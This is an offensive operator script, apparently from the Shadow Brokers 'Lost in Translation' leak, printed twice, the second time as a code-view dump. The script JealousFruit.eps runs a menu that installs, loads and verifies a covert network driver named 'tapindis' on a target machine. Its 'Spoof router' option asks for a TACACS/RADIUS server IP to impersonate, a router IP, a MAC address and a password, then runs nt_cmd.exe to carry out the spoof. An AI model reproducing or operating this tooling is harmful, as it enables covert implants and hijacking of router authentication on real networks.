shadowbrokers-exploits/windows/Resources/Ep/Scripts/JealousFruit.eps

#--------------------------------------------------------
# File: JealousFruit.eps
#
# Wrapper script for JealousFruit tools
#
# Modifications:
#  02/28/03	Created.
#--------------------------------------------------------

@echo off;

# defaults
string $driverName = "tapindis";

# commands
int $installCmdsStart = 1;
int $normalCmdsStart = 8;
int $controlCmdsStart = 8;
int $captureCmdsStart = 16;
string $commands;
$commands[0] = "Quit";

# start of "install" commands
$commands[1] = "Change driver name";
$commands[2] = "Install tools";
$commands[3] = "Uninstall tools";
$commands[4] = "Load driver";
$commands[5] = "Unload driver";
$commands[6] = "Verify install";
$commands[7] = "Verify driver is running";

# NOTE: not sure how many of these cmds we need to support, if any, 
# as in if we don't have config or control commands, do we still need 
# place holders for them ???

# start of "config" commands
#$commands[8] = "Get current status (not impl'd)";
#$commands[9] = "Get packet filter (not impl'd)";
#$commands[10] = "Set packet filter (not impl'd)";
#$commands[11] = "Set max capture file size (not impl'd)";

# start of "control" commands
$commands[8] = "Spoof router";
#$commands[13] = "Enable scanning (not impl'd)";
#$commands[14] = "Stop scanning (not impl'd)";
#$commands[15] = "Start scanning (not impl'd)";

# start of "capture file" commands
#$commands[16] = "Retreive packet capture file (not impl'd)";
#$commands[17] = "Delete packet capture file (not impl'd)";
#$commands[18] = "Parse capture file (not impl'd)";

@record on;

while (true) {
    echo "\r\n\r\n";

    # Print the current configuration
    echo "Current Configuration:";
    echo "\tDriver name : $driverName";
    echo "";

    # print the command list
    int $i=0;
    while ($i < sizeof($commands)) {
	if ($i == $installCmdsStart) {
	    echo "";
	    echo "Installation commands:";
	} else if ($i == $normalCmdsStart) {
	    echo "";
	    echo "Configuration commands";
	} else if ($i == $controlCmdsStart) {
	    echo "";
	    echo "Control commands:";
	} else if ($i == $captureCmdsStart) {
	    echo "";
	    echo "Capture File commands:";
	}
	echo "($i). $commands[$i]";
	$i++;
    }

    echo "";
    int $choice = GetInput("Enter the desired option");
    if ($choice == 0) {
	# quit
	return true;
    } else if ($choice == 1) {
	# Change driver name
	echo "Current driver name = '$driverName'";
	$driverName = GetInput("Enter new driver name");
    } else if ($choice == 2) {
	# install driver
	if (`script JealousFruit\\Install.eps $driverName`) {
	    echo "INSTALL SUCCESS";
	    echo "";
	    echo "NOTE: The driver has not been loaded";
	} else {
	    echo "**** INSTALL FAILED ****";
	}
    } else if ($choice == 3) {
	# uinstall driver
	if (`script JealousFruit\\Uninstall.eps $driverName`) {
	    echo "UNINSTALL SUCCESS";
	} else {
	    echo "**** UNINSTALL FAILED ****";
	}
    } else if ($choice == 4) {
	# load the driver
	if (prompt "Load the driver ($driverName)?") {
	    @echo on;
	    `driverload -name $driverName`;
	    @echo off;
	}
    } else if ($choice == 5) {
	# unload the driver
	if (prompt "Unload the driver ($driverName)?") {
	    @echo on;
	    `driverunload -name $driverName`;
	    @echo off;
	}

    } else if ($choice == 6) {
	# verify install
	if (`script JealousFruit\\VerifyInstall.eps $driverName`) {
	    echo "VERIFICATION SUCCESSFULL";
	} else {
	    echo "**** UNABLE TO VERIFY INSTALL ****";
	}
    } else if ($choice == 7) {
	# verify install
	if (`script JealousFruit\\VerifyRunning.eps $driverName`) {
	    echo "VERIFICATION SUCCESSFULL";
	} else {
	    echo "**** UNABLE TO VERIFY DRIVER IS RUNNING ****";
	}

	### CONTROL COMMANDS ###

    } else if ($choice == 8) {
	# spoof the router
	
	# get the root directory
	string $nt_root;

	if (`regquery -hive L -subkey "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" -value SystemRoot`) {
    		$nt_root = GetCmdData("enum_keyvalue_data");
	}

	ifnot (defined($nt_root[0])) {
    		echo "* Unable to determine system root";
		$nt_root = GetInput("Enter the system root (eg c:\\winnt)");
		ifnot (defined($nt_root[0])) {
    			return false;
		}
	}
	string $spoof_ip = "0.0.0.0";
	string $target_ip = "0.0.0.0";
	string $target_mac = "0123456789af";
	string $pass = "password";
	$spoof_ip = GetInput("Enter the TACACS/RADIUS server IP (the IP to masquerade as)");
	$target_ip = GetInput("Enter the Router IP ");
	$target_mac = GetInput("Enter the MAC address of the Router");
	$pass = GetInput("Enter the password to use");
	
	if (`run -command "$nt_root\\nt_cmd.exe -s $spoof_ip -t $target_ip -m $target_mac -p $pass" `) {
	    echo "SPOOF SUCCESSFULL";
	} else {
	    echo "**** UNABLE TO SPOOF ROUTER ****";
	}


    } else {
	# invalid choice
	echo "*** Invalid choice ***";
    }

    pause;
}

@record off;

return true;
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 04:45:07 -05:00			`#--------------------------------------------------------`
			`# File: JealousFruit.eps`
			`#`
			`# Wrapper script for JealousFruit tools`
			`#`
			`# Modifications:`
			`# 02/28/03 Created.`
			`#--------------------------------------------------------`

			`@echo off;`

			`# defaults`
			`string $driverName = "tapindis";`

			`# commands`
			`int $installCmdsStart = 1;`
			`int $normalCmdsStart = 8;`
			`int $controlCmdsStart = 8;`
			`int $captureCmdsStart = 16;`
			`string $commands;`
			`$commands[0] = "Quit";`

			`# start of "install" commands`
			`$commands[1] = "Change driver name";`
			`$commands[2] = "Install tools";`
			`$commands[3] = "Uninstall tools";`
			`$commands[4] = "Load driver";`
			`$commands[5] = "Unload driver";`
			`$commands[6] = "Verify install";`
			`$commands[7] = "Verify driver is running";`

			`# NOTE: not sure how many of these cmds we need to support, if any,`
			`# as in if we don't have config or control commands, do we still need`
			`# place holders for them ???`

			`# start of "config" commands`
			`#$commands[8] = "Get current status (not impl'd)";`
			`#$commands[9] = "Get packet filter (not impl'd)";`
			`#$commands[10] = "Set packet filter (not impl'd)";`
			`#$commands[11] = "Set max capture file size (not impl'd)";`

			`# start of "control" commands`
			`$commands[8] = "Spoof router";`
			`#$commands[13] = "Enable scanning (not impl'd)";`
			`#$commands[14] = "Stop scanning (not impl'd)";`
			`#$commands[15] = "Start scanning (not impl'd)";`

			`# start of "capture file" commands`
			`#$commands[16] = "Retreive packet capture file (not impl'd)";`
			`#$commands[17] = "Delete packet capture file (not impl'd)";`
			`#$commands[18] = "Parse capture file (not impl'd)";`

			`@record on;`

			`while (true) {`
			`echo "\r\n\r\n";`

			`# Print the current configuration`
			`echo "Current Configuration:";`
			`echo "\tDriver name : $driverName";`
			`echo "";`

			`# print the command list`
			`int $i=0;`
			`while ($i < sizeof($commands)) {`
			`if ($i == $installCmdsStart) {`
			`echo "";`
			`echo "Installation commands:";`
			`} else if ($i == $normalCmdsStart) {`
			`echo "";`
			`echo "Configuration commands";`
			`} else if ($i == $controlCmdsStart) {`
			`echo "";`
			`echo "Control commands:";`
			`} else if ($i == $captureCmdsStart) {`
			`echo "";`
			`echo "Capture File commands:";`
			`}`
			`echo "($i). $commands[$i]";`
			`$i++;`
			`}`

			`echo "";`
			`int $choice = GetInput("Enter the desired option");`
			`if ($choice == 0) {`
			`# quit`
			`return true;`
			`} else if ($choice == 1) {`
			`# Change driver name`
			`echo "Current driver name = '$driverName'";`
			`$driverName = GetInput("Enter new driver name");`
			`} else if ($choice == 2) {`
			`# install driver`
			if (`script JealousFruit\\Install.eps $driverName`) {
			`echo "INSTALL SUCCESS";`
			`echo "";`
			`echo "NOTE: The driver has not been loaded";`
			`} else {`
			`echo "** INSTALL FAILED **";`
			`}`
			`} else if ($choice == 3) {`
			`# uinstall driver`
			if (`script JealousFruit\\Uninstall.eps $driverName`) {
			`echo "UNINSTALL SUCCESS";`
			`} else {`
			`echo "** UNINSTALL FAILED **";`
			`}`
			`} else if ($choice == 4) {`
			`# load the driver`
			`if (prompt "Load the driver ($driverName)?") {`
			`@echo on;`
			`driverload -name $driverName`;
			`@echo off;`
			`}`
			`} else if ($choice == 5) {`
			`# unload the driver`
			`if (prompt "Unload the driver ($driverName)?") {`
			`@echo on;`
			`driverunload -name $driverName`;
			`@echo off;`
			`}`

			`} else if ($choice == 6) {`
			`# verify install`
			if (`script JealousFruit\\VerifyInstall.eps $driverName`) {
			`echo "VERIFICATION SUCCESSFULL";`
			`} else {`
			`echo "** UNABLE TO VERIFY INSTALL **";`
			`}`
			`} else if ($choice == 7) {`
			`# verify install`
			if (`script JealousFruit\\VerifyRunning.eps $driverName`) {
			`echo "VERIFICATION SUCCESSFULL";`
			`} else {`
			`echo "** UNABLE TO VERIFY DRIVER IS RUNNING **";`
			`}`

			`### CONTROL COMMANDS ###`

			`} else if ($choice == 8) {`
			`# spoof the router`

			`# get the root directory`
			`string $nt_root;`

			if (`regquery -hive L -subkey "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" -value SystemRoot`) {
			`$nt_root = GetCmdData("enum_keyvalue_data");`
			`}`

			`ifnot (defined($nt_root[0])) {`
			`echo "* Unable to determine system root";`
			`$nt_root = GetInput("Enter the system root (eg c:\\winnt)");`
			`ifnot (defined($nt_root[0])) {`
			`return false;`
			`}`
			`}`
			`string $spoof_ip = "0.0.0.0";`
			`string $target_ip = "0.0.0.0";`
			`string $target_mac = "0123456789af";`
			`string $pass = "password";`
			`$spoof_ip = GetInput("Enter the TACACS/RADIUS server IP (the IP to masquerade as)");`
			`$target_ip = GetInput("Enter the Router IP ");`
			`$target_mac = GetInput("Enter the MAC address of the Router");`
			`$pass = GetInput("Enter the password to use");`

			if (`run -command "$nt_root\\nt_cmd.exe -s $spoof_ip -t $target_ip -m $target_mac -p $pass" `) {
			`echo "SPOOF SUCCESSFULL";`
			`} else {`
			`echo "** UNABLE TO SPOOF ROUTER **";`
			`}`


			`} else {`
			`# invalid choice`
			`echo "* Invalid choice *";`
			`}`

			`pause;`
			`}`

			`@record off;`

			`return true;`